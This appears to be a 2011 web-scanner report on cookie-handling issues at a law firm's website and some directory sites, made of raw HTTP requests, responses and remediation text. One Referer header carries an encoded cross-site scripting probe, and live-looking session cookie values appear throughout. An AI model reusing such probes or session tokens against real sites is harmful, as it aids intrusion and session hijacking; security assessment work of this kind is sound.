<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 19 Jan 2011 15:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/ location: http://www.joinfulbright.com Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dc/x22 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /downloads HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dubai HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /industries HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insite HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /international HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jblount HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/act_ticker_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
<images>
<item> <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news> <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&article_id=9405&site_id=286< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newsTicker.swf HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/dc Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /offices HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /seminars/act_eventbanner_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /technology HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /washington%20dc%20law%20firms HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Washington-DC/Attorneys HTTP/1.1 Host: www.yellowpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 19 Jan 2011 15:13:37 GMT Status: 301 Moved Permanently Server: nginx Content-Type: text/plain Location: http://www.yellowpages.com/washington-dc/attorneys Content-Length: 9 X-Urid: d-9ca453f0-060c-012e-b0d1-001e0be96752 Expires: Wed, 19 Jan 2011 15:13:36 GMT Cache-Control: no-cache Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT Connection: close
moved to
10. Cookie without HttpOnly flag setpreviousnext There are 237 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /domainserve/domainView HTTP/1.1 Host: web2.domainmall.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw HTTP/1.1 Host: wsdsapi.infospace.com Proxy-Connection: keep-alive Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.arnoldporter.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
